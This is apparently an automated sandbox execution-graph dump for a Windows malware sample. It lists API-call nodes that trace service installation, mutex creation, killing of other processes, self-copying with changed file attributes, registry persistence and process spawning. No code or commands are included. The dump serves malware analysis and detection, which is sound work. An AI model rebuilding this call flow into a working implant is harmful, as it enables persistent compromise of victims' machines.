                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                            Execution Coverage:6%
                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                                            Total number of Nodes:1713
                                                                                                                                                                                                            Total number of Limit Nodes:13
                                                                                                                                                                                                            execution_graph 10337 156c10 10339 156c21 RegisterServiceCtrlHandlerA 10337->10339 10340 156da2 SetServiceStatus CreateEventA 10339->10340 10341 156fc8 10339->10341 10342 156e58 SetServiceStatus 10340->10342 10343 156e3b 10340->10343 10344 156ea0 WaitForSingleObject 10342->10344 10343->10342 10344->10344 10345 156ecb 10344->10345 10346 163110 WaitForSingleObject 10345->10346 10347 156eff SetServiceStatus CloseHandle SetServiceStatus 10346->10347 10347->10341 10348 14e211 10349 14e240 ExitProcess 10348->10349 11222 15bf90 11225 15e140 11222->11225 11226 15e158 11225->11226 11227 160b00 8 API calls 11226->11227 11228 15bfb3 11227->11228 11229 164590 11230 1645bd 11229->11230 11231 160610 2 API calls 11230->11231 11232 1645c2 11231->11232 11233 16fde0 3 API calls 11232->11233 11234 1645ee 11233->11234 11235 165f98 11238 165706 11235->11238 11236 1686f1 11238->11236 11239 14d500 lstrlen 11238->11239 11239->11238 11167 14a307 11168 14a310 Sleep 11167->11168 11168->11168 10985 141080 10986 14108b 10985->10986 10989 160b00 10986->10989 10988 141117 10990 163f00 8 API calls 10989->10990 10991 160b1c 10990->10991 10991->10988 10992 142080 10993 142097 10992->10993 10994 160790 4 API calls 10993->10994 10995 1421e4 10994->10995 11240 14c980 11241 14c99d 11240->11241 11242 14e2c0 2 API calls 11241->11242 11243 14c9f6 11242->11243 10351 15de00 10352 15de15 10351->10352 10355 16b500 10352->10355 10354 15de3d 10356 16b51e 10355->10356 10359 1566f0 10356->10359 10358 16b5e9 10358->10354 10360 15670d 10359->10360 10361 150110 8 API calls 10360->10361 10362 156738 10361->10362 10362->10358 11169 151500 11172 15ee60 11169->11172 11173 15b720 lstrlen 11172->11173 11174 15150f 11173->11174 11175 14bd08 11182 14bd10 11175->11182 11176 14a4e0 lstrlen 11176->11182 11177 14bdbb OpenProcess 11179 14be02 TerminateProcess 11177->11179 11177->11182 11178 14bedd Process32Next 11180 14bf19 CloseHandle 11178->11180 11178->11182 11181 14be67 CloseHandle 11179->11181 11179->11182 11184 14bf47 11180->11184 11181->11182 11182->11176 11182->11177 11182->11178 11182->11181 9406 174f8a 9407 174ec5 9406->9407 9410 147a04 9407->9410 9647 151bb0 9410->9647 9414 147a60 9415 151bb0 2 API calls 9414->9415 9416 147aa7 9415->9416 9417 142f90 2 API calls 9416->9417 9418 147b0e 9417->9418 9419 151bb0 2 API calls 9418->9419 9420 147b22 9419->9420 9421 142f90 2 API calls 9420->9421 9422 147bad 9421->9422 9423 151bb0 2 API calls 9422->9423 9424 147bc3 9423->9424 9425 142f90 2 API calls 9424->9425 9426 147c07 9425->9426 9427 151bb0 2 API calls 9426->9427 9428 147c7a 9427->9428 9429 142f90 2 API calls 9428->9429 9430 147cb7 9429->9430 9431 151bb0 2 API calls 9430->9431 9432 147d1b 9431->9432 9433 142f90 2 API calls 9432->9433 9434 147d90 9433->9434 9435 151bb0 2 API calls 9434->9435 9436 147da6 9435->9436 9437 142f90 2 API calls 9436->9437 9438 147dfc 9437->9438 9439 151bb0 2 API calls 9438->9439 9440 147e1a 9439->9440 9441 142f90 2 API calls 9440->9441 9442 147e73 9441->9442 9443 151bb0 2 API calls 9442->9443 9444 147e87 9443->9444 9445 142f90 2 API calls 9444->9445 9446 147ef1 9445->9446 9447 151bb0 2 API calls 9446->9447 9448 147f05 9447->9448 9449 142f90 2 API calls 9448->9449 9450 147f42 9449->9450 9451 151bb0 2 API calls 9450->9451 9452 147f62 9451->9452 9453 142f90 2 API calls 9452->9453 9454 147fe8 9453->9454 9455 151bb0 2 API calls 9454->9455 9456 148004 9455->9456 9457 142f90 2 API calls 9456->9457 9458 148093 9457->9458 9459 151bb0 2 API calls 9458->9459 9460 1480a7 9459->9460 9461 142f90 2 API calls 9460->9461 9462 148106 9461->9462 9463 151bb0 2 API calls 9462->9463 9464 14818f 9463->9464 9465 142f90 2 API calls 9464->9465 9466 1481d1 9465->9466 9467 151bb0 2 API calls 9466->9467 9468 1481eb 9467->9468 9469 142f90 2 API calls 9468->9469 9470 148230 9469->9470 9471 151bb0 2 API calls 9470->9471 9472 148268 9471->9472 9473 151bb0 2 API calls 9472->9473 9474 1482b6 9473->9474 9655 152eb0 GetProcessHeap RtlFreeHeap 9474->9655 9478 14839b 9479 142f90 2 API calls 9478->9479 9480 1483c0 GetEnvironmentVariableA 9479->9480 9481 151bb0 2 API calls 9480->9481 9482 1483f9 CreateMutexA 9481->9482 9484 148480 CreateMutexA CreateMutexA 9482->9484 9486 148521 9484->9486 9487 148587 GetTickCount 9486->9487 9488 14868b 9486->9488 9490 1485a5 9487->9490 9664 155200 9488->9664 9492 142f90 2 API calls 9490->9492 9491 1486a4 GetCommandLineA 9493 1486cb 9491->9493 9495 1485bd 9492->9495 9494 142f90 2 API calls 9493->9494 9496 14874d 9494->9496 9497 151bb0 2 API calls 9495->9497 9499 151bb0 2 API calls 9496->9499 9498 148622 9497->9498 9498->9488 9500 14878c 9499->9500 9501 149235 GetCommandLineA 9500->9501 9503 142f90 2 API calls 9500->9503 9766 16b990 9501->9766 9505 1487dd 9503->9505 9506 151bb0 2 API calls 9505->9506 9508 148812 9506->9508 9507 149271 9769 14d500 lstrlen 9507->9769 9509 148842 9508->9509 9511 142800 ExitProcess 9508->9511 9514 142f90 2 API calls 9509->9514 9511->9509 9512 149323 GetModuleFileNameA 9770 14a4e0 lstrlen 9512->9770 9515 1488ab 9514->9515 9517 151bb0 2 API calls 9515->9517 9516 1493ae 9519 14a4e0 lstrlen 9516->9519 9518 1488db 9517->9518 9520 148926 9518->9520 9522 142800 ExitProcess 9518->9522 9521 14945a 9519->9521 9784 14e430 9520->9784 9523 14a4e0 lstrlen 9521->9523 9522->9520 9538 14947b 9523->9538 9525 148961 9526 142f90 2 API calls 9525->9526 9527 148978 9526->9527 9531 151bb0 2 API calls 9527->9531 9528 149744 9772 163cf0 9528->9772 9530 1497b2 9532 1497d4 9530->9532 9781 142800 9530->9781 9537 1489cb 9531->9537 9850 169b00 9532->9850 9536 14981d 9539 1708b0 GetSystemTimeAsFileTime 9536->9539 9554 148ab7 9537->9554 9538->9528 9541 14954b 9538->9541 9540 149830 9539->9540 9944 1648d0 9540->9944 9830 158a70 9541->9830 9543 14956f 9836 169580 9543->9836 9547 14971a 9548 142800 ExitProcess 9547->9548 9548->9528 9549 14958b 9549->9547 9552 142f90 2 API calls 9549->9552 9551 148b61 Sleep 9551->9554 9553 149651 9552->9553 9849 14d500 lstrlen 9553->9849 9554->9551 9556 148c99 Sleep 9554->9556 9557 151530 CreateFileA GetFileTime CloseHandle GetFileSize CloseHandle 9554->9557 9574 148cd8 9554->9574 9789 152120 9554->9789 9800 1708b0 GetSystemTimeAsFileTime 9554->9800 9556->9554 9557->9554 9558 149666 MessageBoxA 9561 151bb0 2 API calls 9558->9561 9560 152120 5 API calls 9560->9574 9562 1496ef 9561->9562 9565 142800 ExitProcess 9562->9565 9563 148de6 9815 151530 9563->9815 9565->9547 9566 1498a8 9568 142f90 2 API calls 9566->9568 9572 1499ff 9566->9572 9567 148e04 9577 1491a4 9567->9577 9578 148e5c GetModuleFileNameA SetFileAttributesA CopyFileA 9567->9578 9570 1499e4 9568->9570 9948 14c540 9570->9948 9571 148d8c Sleep 9571->9574 9573 149a71 9572->9573 9953 15ee80 9572->9953 9582 149aa3 CloseHandle SetFileAttributesA CopyFileA 9573->9582 9604 149d65 9573->9604 9574->9560 9574->9563 9802 14bbc0 9574->9802 9825 16fa80 9577->9825 9580 142f90 2 API calls 9578->9580 9579 149a32 9581 149a53 9579->9581 9583 142800 ExitProcess 9579->9583 9592 148eff 9580->9592 9964 1426e0 9581->9964 9585 149c78 9582->9585 9586 149b1a SetFileAttributesA 9582->9586 9583->9581 9994 163110 9585->9994 9588 149b73 9586->9588 9589 149b5d 9586->9589 9596 149c2a Sleep 9588->9596 9984 157a50 9588->9984 9972 150500 OpenSCManagerA 9589->9972 9590 149210 9593 142800 ExitProcess 9590->9593 9594 151bb0 2 API calls 9592->9594 9593->9501 9598 148f61 9594->9598 9601 16fa80 3 API calls 9596->9601 9597 152120 5 API calls 9597->9604 9606 142f90 2 API calls 9598->9606 9619 14904a 9598->9619 9601->9585 9603 149e57 SetFileAttributesA CopyFileA SetFileAttributesA 9612 14e430 lstrlen 9603->9612 9604->9597 9604->9603 9610 14bbc0 8 API calls 9604->9610 9616 148fbf 9606->9616 9607 149113 SetFileAttributesA 9607->9577 9608 14913d SetFileAttributesA 9608->9577 9609 142800 ExitProcess 9609->9604 9611 149e1a Sleep 9610->9611 9611->9603 9611->9604 9614 149ee1 9612->9614 9615 142f90 2 API calls 9614->9615 9618 149efd 9615->9618 9617 151bb0 2 API calls 9616->9617 9617->9619 9620 142f90 2 API calls 9618->9620 9619->9607 9619->9608 9621 149fbe 9620->9621 9622 151bb0 2 API calls 9621->9622 9623 14a039 9622->9623 9998 150dc0 9623->9998 9625 14a050 9626 151bb0 2 API calls 9625->9626 9627 14a06b 9626->9627 10002 151200 9627->10002 9630 142f90 2 API calls 9631 14a0ae 9630->9631 9632 142f90 2 API calls 9631->9632 9633 14a0c6 9632->9633 10023 175820 9633->10023 9635 14a0f2 9636 151bb0 2 API calls 9635->9636 9637 14a115 9636->9637 9638 151bb0 2 API calls 9637->9638 9639 14a127 9638->9639 9640 16fa80 3 API calls 9639->9640 9641 14a185 9640->9641 9642 14a24e CreateThread 9641->9642 9643 14a2a2 9642->9643 9644 14a2cd 9642->9644 10026 14c660 StartServiceCtrlDispatcherA 9643->10026 9646 14a310 Sleep 9644->9646 9646->9646 9648 151bd0 9647->9648 9649 152eb0 2 API calls 9648->9649 9650 147a18 9649->9650 9651 142f90 9650->9651 9652 142feb 9651->9652 10027 14e2c0 9652->10027 9654 143034 9654->9414 9656 148388 9655->9656 9657 1750e0 9656->9657 9658 175186 GetSystemTime 9657->9658 9659 175172 9657->9659 9660 1751be 9658->9660 9659->9658 9661 1708b0 GetSystemTimeAsFileTime 9660->9661 9662 1752a7 GetTickCount 9661->9662 9663 1752d4 9662->9663 9663->9478 9665 15521d 9664->9665 9666 1552b2 GetVersionExA 9665->9666 10030 14b7a0 AllocateAndInitializeSid 9666->10030 9672 142f90 2 API calls 9673 155652 9672->9673 10050 14d530 9673->10050 9675 155357 9678 155496 CreateDirectoryA 9675->9678 9677 151bb0 2 API calls 9681 155692 9677->9681 9679 142f90 2 API calls 9678->9679 9680 1554bb 9679->9680 9682 151bb0 2 API calls 9680->9682 10054 151d90 9681->10054 9685 15550a 9682->9685 9684 1556cb 9686 1556d6 DeleteFileA RemoveDirectoryA 9684->9686 9687 15575d 9684->9687 9685->9672 9686->9687 9688 14f0d0 6 API calls 9687->9688 9689 155776 9688->9689 9690 15581e CreateDirectoryA 9689->9690 9691 15585b 9690->9691 9692 14e430 lstrlen 9691->9692 9693 1558cb CreateDirectoryA 9692->9693 9694 155917 9693->9694 9695 142f90 2 API calls 9694->9695 9696 15592d 9695->9696 9697 142f90 2 API calls 9696->9697 9698 1559e9 9697->9698 9699 151bb0 2 API calls 9698->9699 9700 155a07 9699->9700 9701 14d530 9 API calls 9700->9701 9702 155a77 9701->9702 9703 151bb0 2 API calls 9702->9703 9704 155aaa 9703->9704 9705 151d90 5 API calls 9704->9705 9706 155ad7 9705->9706 9707 1564f5 9706->9707 9708 155b07 9706->9708 9709 155c42 9706->9709 9713 14e430 lstrlen 9707->9713 9710 142f90 2 API calls 9708->9710 9711 142f90 2 API calls 9709->9711 9712 155b2d 9710->9712 9714 155c61 9711->9714 9716 175820 wvsprintfA 9712->9716 9717 156549 SetFileAttributesA 9713->9717 9715 175820 wvsprintfA 9714->9715 9718 155c87 9715->9718 9719 155b5a 9716->9719 9722 15657e 9717->9722 9720 151bb0 2 API calls 9718->9720 9721 151bb0 2 API calls 9719->9721 9724 155b9f 9720->9724 9721->9724 9722->9491 9723 155bea 9725 155d53 CreateDirectoryA 9723->9725 9724->9723 9726 155d9a 9725->9726 9727 14e430 lstrlen 9726->9727 9728 155e4f CreateDirectoryA 9727->9728 9729 142f90 2 API calls 9728->9729 9730 155e9e 9729->9730 9731 142f90 2 API calls 9730->9731 9732 155f4c 9731->9732 9733 151bb0 2 API calls 9732->9733 9734 155f68 9733->9734 9735 14d530 9 API calls 9734->9735 9736 155f86 9735->9736 9737 151bb0 2 API calls 9736->9737 9738 155fcf 9737->9738 9739 151d90 5 API calls 9738->9739 9740 156002 9739->9740 9741 156485 9740->9741 9742 15600d GetTempPathA 9740->9742 9741->9707 10070 14d500 lstrlen 9742->10070 9744 15604f 9745 14e430 lstrlen 9744->9745 9746 1561cb CreateDirectoryA 9745->9746 9748 156219 9746->9748 9749 142f90 2 API calls 9748->9749 9750 156237 9749->9750 9751 142f90 2 API calls 9750->9751 9752 1562be 9751->9752 9753 151bb0 2 API calls 9752->9753 9754 156302 9753->9754 9755 14d530 9 API calls 9754->9755 9756 156360 9755->9756 9757 151bb0 2 API calls 9756->9757 9758 156372 9757->9758 9759 151d90 5 API calls 9758->9759 9760 1563b5 9759->9760 9760->9741 9761 1563c0 GetTempPathA 9760->9761 9762 1563ff 9761->9762 9763 142f90 2 API calls 9762->9763 9764 15642d 9763->9764 9765 151bb0 2 API calls 9764->9765 9765->9741 10109 14d500 lstrlen 9766->10109 9768 16b9c3 9768->9507 9769->9512 9771 14a53c 9770->9771 9771->9516 9773 163d35 9772->9773 9774 14e430 lstrlen 9773->9774 9775 163d66 9774->9775 9776 142f90 2 API calls 9775->9776 9777 163d82 9776->9777 9778 151bb0 2 API calls 9777->9778 9779 163dd1 CreateFileA 9778->9779 9780 163e32 9779->9780 9780->9530 9782 14281d 9781->9782 9783 14283e ExitProcess 9782->9783 9785 1648d0 lstrlen 9784->9785 9786 14e451 9785->9786 9787 14e480 9786->9787 10110 14d500 lstrlen 9786->10110 9787->9525 9790 152196 CreateToolhelp32Snapshot 9789->9790 9791 15218c 9789->9791 9792 1521fe Process32First 9790->9792 9793 152450 9790->9793 9791->9790 9795 15240d CloseHandle 9792->9795 9797 15227a 9792->9797 9793->9554 9795->9793 9796 14a4e0 lstrlen 9796->9797 9797->9796 9798 152346 Process32Next 9797->9798 9799 15239c 9797->9799 9798->9797 9798->9799 9799->9795 9801 170958 __aulldiv 9800->9801 9801->9554 9803 14bbe1 CreateToolhelp32Snapshot 9802->9803 9805 14bf47 9803->9805 9806 14bcbb Process32First 9803->9806 9805->9571 9807 14bf1a CloseHandle 9806->9807 9808 14bd05 9806->9808 9807->9805 9809 14a4e0 lstrlen 9808->9809 9810 14bdbb OpenProcess 9808->9810 9811 14bedd Process32Next 9808->9811 9814 14be67 CloseHandle 9808->9814 9809->9808 9810->9808 9812 14be02 TerminateProcess 9810->9812 9811->9808 9813 14bf19 9811->9813 9812->9808 9812->9814 9813->9807 9814->9808 9816 151561 9815->9816 9817 15157f CreateFileA 9815->9817 9816->9817 9818 151611 9817->9818 9819 151657 9818->9819 9820 151673 GetFileTime 9818->9820 9819->9567 9821 151694 CloseHandle 9820->9821 9823 1516bf __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 9820->9823 9821->9567 9822 151771 GetFileSize CloseHandle 9824 1517be 9822->9824 9823->9822 9824->9567 9826 16faaa 9825->9826 9827 16fb6a CreateProcessA 9826->9827 9828 16fc8f 9827->9828 9829 16fbff CloseHandle CloseHandle 9827->9829 9828->9590 9829->9590 9831 158a95 9830->9831 10111 14ca40 9831->10111 9833 158b1d 9834 16fa80 3 API calls 9833->9834 9835 158b65 9834->9835 9835->9543 9837 1695a9 9836->9837 9846 169902 9836->9846 10149 14d500 lstrlen 9837->10149 9839 16965d Sleep 9840 1696b9 9839->9840 9841 142f90 2 API calls 9840->9841 9842 1696e9 9841->9842 9843 151bb0 2 API calls 9842->9843 9844 16979d FindFirstFileA 9843->9844 9845 1697d6 9844->9845 9845->9846 9847 169877 DeleteFileA FindNextFileA 9845->9847 9846->9549 9847->9845 9848 1698d9 FindClose 9847->9848 9848->9846 9849->9558 9851 169b93 9850->9851 9852 169c40 GetComputerNameA 9851->9852 9853 169c53 9852->9853 9854 169cbb 9852->9854 9855 142f90 2 API calls 9853->9855 9856 142f90 2 API calls 9854->9856 9857 169c7e 9855->9857 9858 169d55 9856->9858 9859 151bb0 2 API calls 9857->9859 9860 151bb0 2 API calls 9858->9860 9859->9854 9861 169db1 9860->9861 9862 14d530 9 API calls 9861->9862 9863 169dd5 9862->9863 10150 152c30 9863->10150 9865 169e08 10153 15a930 9865->10153 9867 169f23 10192 14d500 lstrlen 9867->10192 9869 169f65 10193 1701a0 9869->10193 9873 169fcf 9874 152c30 8 API calls 9873->9874 9875 169ffe 9874->9875 9876 1701a0 9 API calls 9875->9876 9877 16a0a3 9876->9877 9878 171050 8 API calls 9877->9878 9879 16a0b2 9878->9879 9880 152c30 8 API calls 9879->9880 9881 16a0dd 9880->9881 9882 1701a0 9 API calls 9881->9882 9883 16a118 9882->9883 9884 171050 8 API calls 9883->9884 9885 16a127 9884->9885 9886 152c30 8 API calls 9885->9886 9887 16a16c 9886->9887 9888 1701a0 9 API calls 9887->9888 9889 16a18b 9888->9889 9890 171050 8 API calls 9889->9890 9891 16a197 9890->9891 9892 152c30 8 API calls 9891->9892 9893 16a1e1 9892->9893 9894 1701a0 9 API calls 9893->9894 9895 16a204 9894->9895 9896 171050 8 API calls 9895->9896 9897 16a213 9896->9897 9898 152c30 8 API calls 9897->9898 9899 16a248 9898->9899 9900 142f90 2 API calls 9899->9900 9901 16a280 9900->9901 9902 1701a0 9 API calls 9901->9902 9903 16a2bf 9902->9903 9904 171050 8 API calls 9903->9904 9905 16a2ce 9904->9905 9906 151bb0 2 API calls 9905->9906 9907 16a2f5 9906->9907 9908 152c30 8 API calls 9907->9908 9909 16a31b 9908->9909 9910 1701a0 9 API calls 9909->9910 9911 16a347 9910->9911 9912 171050 8 API calls 9911->9912 9913 16a353 9912->9913 9914 152c30 8 API calls 9913->9914 9915 16a391 9914->9915 9916 1701a0 9 API calls 9915->9916 9917 16a3aa 9916->9917 9918 171050 8 API calls 9917->9918 9919 16a3b9 9918->9919 9920 152c30 8 API calls 9919->9920 9921 16a402 9920->9921 10200 152f60 9921->10200 9925 16a465 9926 1701a0 9 API calls 9925->9926 9927 16a471 9926->9927 9928 171050 8 API calls 9927->9928 9929 16a480 9928->9929 9930 152c30 8 API calls 9929->9930 9931 16a4d1 9930->9931 9932 1701a0 9 API calls 9931->9932 9933 16a502 9932->9933 9934 171050 8 API calls 9933->9934 9935 16a511 9934->9935 10209 1597b0 9935->10209 9937 16a54f 10236 15d990 9937->10236 9939 16a575 10239 154290 9939->10239 9941 16a5b3 10243 160480 9941->10243 9943 16a63b 9943->9536 9945 164926 9944->9945 10294 14d500 lstrlen 9945->10294 9947 164948 9947->9566 9949 163110 WaitForSingleObject 9948->9949 9950 14c562 9949->9950 9951 142800 ExitProcess 9950->9951 9952 14c578 9951->9952 9952->9572 9954 15ee9d 9953->9954 9955 14e430 lstrlen 9954->9955 9956 15eef8 9955->9956 9957 142f90 2 API calls 9956->9957 9958 15ef29 9956->9958 9959 15ef91 9957->9959 9958->9579 9960 151bb0 2 API calls 9959->9960 9961 15f001 9960->9961 10295 14d000 9961->10295 9963 15f020 9963->9579 9965 1708b0 GetSystemTimeAsFileTime 9964->9965 9966 142703 9965->9966 9967 1427c8 9966->9967 9968 1708b0 GetSystemTimeAsFileTime 9966->9968 9967->9573 9970 142751 9968->9970 9969 142770 Sleep 9969->9970 9970->9967 9970->9969 9971 1708b0 GetSystemTimeAsFileTime 9970->9971 9971->9970 9973 15055f CreateServiceA 9972->9973 9974 1507be 9972->9974 9975 1505be 9973->9975 9974->9588 9976 1506bc OpenServiceA 9975->9976 9977 1505d8 ChangeServiceConfig2A StartServiceA 9975->9977 9980 150716 StartServiceA CloseServiceHandle 9976->9980 9981 15075e CloseServiceHandle 9976->9981 9979 15067e CloseServiceHandle 9977->9979 9979->9981 9980->9981 9981->9974 9985 157ab7 9984->9985 9986 142f90 2 API calls 9985->9986 9987 157b71 9986->9987 9988 151bb0 2 API calls 9987->9988 9989 157bcb 9988->9989 9990 157cc0 RegCloseKey 9989->9990 10313 14d500 lstrlen 9989->10313 9991 149c15 9990->9991 9991->9596 9993 157c87 RegSetValueExA 9993->9990 9995 16312e WaitForSingleObject 9994->9995 9997 149d15 9995->9997 9997->9609 9999 150de7 9998->9999 10000 150f4e CreateFileA 9999->10000 10001 150f80 10000->10001 10001->9625 10003 151254 10002->10003 10004 15126b 10002->10004 10005 150920 8 API calls 10003->10005 10006 142f90 2 API calls 10004->10006 10005->10004 10007 1512b3 10006->10007 10008 150dc0 CreateFileA 10007->10008 10009 1512cd 10008->10009 10010 151bb0 2 API calls 10009->10010 10011 15131f 10010->10011 10012 151378 Sleep 10011->10012 10022 151420 10011->10022 10013 142f90 2 API calls 10012->10013 10014 1513b7 10013->10014 10016 150dc0 CreateFileA 10014->10016 10018 1513cc 10016->10018 10017 15147c 10319 175370 CloseHandle 10017->10319 10021 151bb0 2 API calls 10018->10021 10020 14a090 10020->9630 10021->10022 10022->10020 10314 1510e0 10022->10314 10024 17587d wvsprintfA 10023->10024 10025 17586d 10023->10025 10024->9635 10025->10024 10026->9644 10028 14e2e4 10027->10028 10029 14e2f2 GetProcessHeap RtlAllocateHeap 10027->10029 10028->10029 10029->9654 10031 14b84e 10030->10031 10032 14b86a CheckTokenMembership 10031->10032 10033 14b887 10031->10033 10032->10033 10034 14fbc0 10033->10034 10035 14fc3c 10034->10035 10036 142f90 2 API calls 10035->10036 10037 14fc76 GetProcAddress 10036->10037 10038 151bb0 2 API calls 10037->10038 10039 14fcb4 10038->10039 10040 14fcc5 GetCurrentProcess 10039->10040 10041 14fcdc 10039->10041 10040->10041 10041->9685 10042 14f0d0 GetWindowsDirectoryA 10041->10042 10043 14f122 10042->10043 10044 142f90 2 API calls 10043->10044 10045 14f1d3 10043->10045 10046 14f170 10044->10046 10045->9675 10047 151bb0 2 API calls 10046->10047 10048 14f1bb 10047->10048 10071 14d500 lstrlen 10048->10071 10051 14d54a 10050->10051 10072 14fa50 10051->10072 10055 151d9d 10054->10055 10056 163110 WaitForSingleObject 10055->10056 10057 151e0c 10056->10057 10058 151e23 10057->10058 10059 151e4c CreateFileA 10057->10059 10060 16fcc0 ReleaseMutex 10058->10060 10061 151e93 10059->10061 10065 151ed1 10059->10065 10062 151e39 10060->10062 10063 16fcc0 ReleaseMutex 10061->10063 10062->9684 10064 151eaf 10063->10064 10064->9684 10066 151fe8 WriteFile 10065->10066 10066->10065 10067 152069 FindCloseChangeNotification 10066->10067 10105 16fcc0 10067->10105 10070->9744 10071->10045 10073 14fa7e 10072->10073 10078 14d500 lstrlen 10073->10078 10075 14fae4 10079 152df0 10075->10079 10077 14d55f 10077->9677 10078->10075 10082 15bff0 10079->10082 10081 152e3e 10081->10077 10083 15c006 10082->10083 10084 15c00d 10083->10084 10087 163f00 10083->10087 10084->10081 10086 15c04f 10086->10081 10088 163f30 10087->10088 10089 163f46 10088->10089 10091 150110 10088->10091 10089->10086 10092 150128 10091->10092 10093 15038a 10092->10093 10094 150266 10092->10094 10097 150367 10092->10097 10100 1568d0 10093->10100 10096 14e2c0 2 API calls 10094->10096 10098 150276 10096->10098 10097->10089 10099 152eb0 2 API calls 10098->10099 10099->10097 10101 156901 10100->10101 10102 156966 GetProcessHeap HeapAlloc 10101->10102 10103 156926 GetProcessHeap RtlReAllocateHeap 10101->10103 10102->10097 10103->10097 10106 16fce5 ReleaseMutex 10105->10106 10107 16fcdb 10105->10107 10108 1520a1 10106->10108 10107->10106 10108->9684 10109->9768 10110->9787 10112 14caa0 10111->10112 10113 14cae7 CreateFileA 10112->10113 10114 14cb3d ReadFile 10113->10114 10118 14cf5d 10113->10118 10115 14cbbc CloseHandle 10114->10115 10116 14cb79 10114->10116 10140 152a20 10115->10140 10116->10115 10118->9833 10119 14cbf5 GetTickCount 10142 171520 10119->10142 10121 14cc2a 10146 14d500 lstrlen 10121->10146 10123 14cc81 10124 142f90 2 API calls 10123->10124 10125 14ccd1 10124->10125 10126 151bb0 2 API calls 10125->10126 10127 14cd00 10126->10127 10129 142f90 2 API calls 10127->10129 10130 14cddc CreateFileA 10127->10130 10132 14cd54 10129->10132 10130->10118 10131 14cef5 WriteFile 10130->10131 10133 14cf46 CloseHandle 10131->10133 10134 14cf32 10131->10134 10147 14d500 lstrlen 10132->10147 10133->10118 10134->10133 10136 14cd6c 10137 175820 wvsprintfA 10136->10137 10138 14cd77 10137->10138 10139 151bb0 2 API calls 10138->10139 10139->10130 10141 152a3b 10140->10141 10141->10119 10143 171546 10142->10143 10148 14d500 lstrlen 10143->10148 10145 1715bf 10145->10121 10146->10123 10147->10136 10148->10145 10149->9839 10151 154290 8 API calls 10150->10151 10152 152c4d 10151->10152 10152->9865 10154 15a998 10153->10154 10155 142f90 2 API calls 10154->10155 10156 15aa6c 10155->10156 10157 151bb0 2 API calls 10156->10157 10158 15aab7 GetProcessHeap 10157->10158 10159 15ab54 10158->10159 10160 15aaeb 10158->10160 10161 142f90 2 API calls 10159->10161 10160->9867 10162 15ab6a LoadLibraryA 10161->10162 10163 15abb1 10162->10163 10164 151bb0 2 API calls 10163->10164 10166 15abcb 10164->10166 10165 15abf6 10165->9867 10166->10165 10167 142f90 2 API calls 10166->10167 10168 15ac99 GetProcAddress 10167->10168 10169 151bb0 2 API calls 10168->10169 10170 15acd9 10169->10170 10171 15acf0 FreeLibrary 10170->10171 10172 15ad28 HeapAlloc 10170->10172 10171->9867 10173 15ad78 10172->10173 10174 15ada4 FreeLibrary 10173->10174 10175 15adfa 10173->10175 10174->9867 10177 15ae30 HeapFree 10175->10177 10182 15af24 10175->10182 10178 15ae77 10177->10178 10179 15ae8a HeapAlloc 10177->10179 10178->10179 10180 15aeaa FreeLibrary 10179->10180 10179->10182 10181 15aedf 10180->10181 10181->9867 10184 142f90 2 API calls 10182->10184 10191 15b22b 10182->10191 10183 15b6ad HeapFree FreeLibrary 10183->9867 10185 15affe 10184->10185 10186 151bb0 2 API calls 10185->10186 10187 15b074 10186->10187 10188 142f90 2 API calls 10187->10188 10187->10191 10189 15b249 10188->10189 10190 151bb0 2 API calls 10189->10190 10190->10191 10191->10183 10192->9869 10248 15a810 10193->10248 10196 171050 10197 171071 10196->10197 10198 154290 8 API calls 10197->10198 10199 17107f 10198->10199 10199->9873 10201 152f95 10200->10201 10202 142f90 2 API calls 10201->10202 10203 152fd0 10202->10203 10204 151bb0 2 API calls 10203->10204 10205 153030 10204->10205 10206 156600 10205->10206 10255 14d500 lstrlen 10206->10255 10208 156655 10208->9925 10210 1597e8 10209->10210 10211 142f90 2 API calls 10210->10211 10212 15987a 10211->10212 10213 142f90 2 API calls 10212->10213 10214 1598a9 10213->10214 10215 142f90 2 API calls 10214->10215 10216 1598d7 10215->10216 10217 151bb0 2 API calls 10216->10217 10218 159917 10217->10218 10219 142f90 2 API calls 10218->10219 10220 159955 10219->10220 10221 151bb0 2 API calls 10220->10221 10222 1599ab 10221->10222 10223 151bb0 2 API calls 10222->10223 10230 159a2b 10223->10230 10224 15a5a1 10225 151bb0 2 API calls 10224->10225 10228 15a606 10225->10228 10226 159f98 10226->10224 10227 15a428 10226->10227 10232 156810 8 API calls 10226->10232 10235 141ca0 9 API calls 10226->10235 10227->10224 10233 156810 8 API calls 10227->10233 10259 141ca0 10227->10259 10228->9937 10230->10226 10231 141ca0 9 API calls 10230->10231 10256 156810 10230->10256 10231->10230 10232->10226 10233->10227 10235->10226 10237 15bff0 8 API calls 10236->10237 10238 15d997 10237->10238 10238->9939 10240 1542e3 10239->10240 10241 15bff0 8 API calls 10240->10241 10242 15432f 10241->10242 10242->9941 10270 164450 10243->10270 10245 160589 10245->9943 10246 1604ab 10246->10245 10247 154290 8 API calls 10246->10247 10247->10245 10249 15a81c 10248->10249 10254 14d500 lstrlen 10249->10254 10251 15a8a0 10252 152df0 8 API calls 10251->10252 10253 15a8ac 10252->10253 10253->10196 10254->10251 10255->10208 10265 151c30 10256->10265 10258 15681e 10258->10230 10260 14d5d0 10259->10260 10269 14d500 lstrlen 10260->10269 10262 14d630 10263 154290 8 API calls 10262->10263 10264 14d63c 10263->10264 10264->10227 10266 151c67 10265->10266 10267 15bff0 8 API calls 10266->10267 10268 151c89 10267->10268 10268->10258 10269->10262 10275 1700f0 10270->10275 10272 164475 10274 1644d7 10272->10274 10279 150920 10272->10279 10274->10246 10276 170149 10275->10276 10277 17010b 10275->10277 10276->10272 10278 15d990 8 API calls 10277->10278 10278->10276 10280 150945 10279->10280 10281 163110 WaitForSingleObject 10280->10281 10282 150a18 10281->10282 10283 142f90 2 API calls 10282->10283 10289 150b2c 10282->10289 10284 150a68 GetProcAddress 10283->10284 10285 150aa7 10284->10285 10286 142f90 2 API calls 10285->10286 10287 150ad3 10286->10287 10290 151bb0 2 API calls 10287->10290 10288 16fcc0 ReleaseMutex 10291 150d8e 10288->10291 10289->10288 10292 150ae7 GetProcAddress 10290->10292 10291->10272 10293 151bb0 2 API calls 10292->10293 10293->10289 10294->9947 10297 14d00d 10295->10297 10296 15d990 8 API calls 10298 14d0dd 10296->10298 10297->10296 10299 163110 WaitForSingleObject 10298->10299 10300 14d0f2 CreateFileA 10299->10300 10301 14d140 10300->10301 10302 14d131 10300->10302 10305 14d1b9 ReadFile 10301->10305 10306 150110 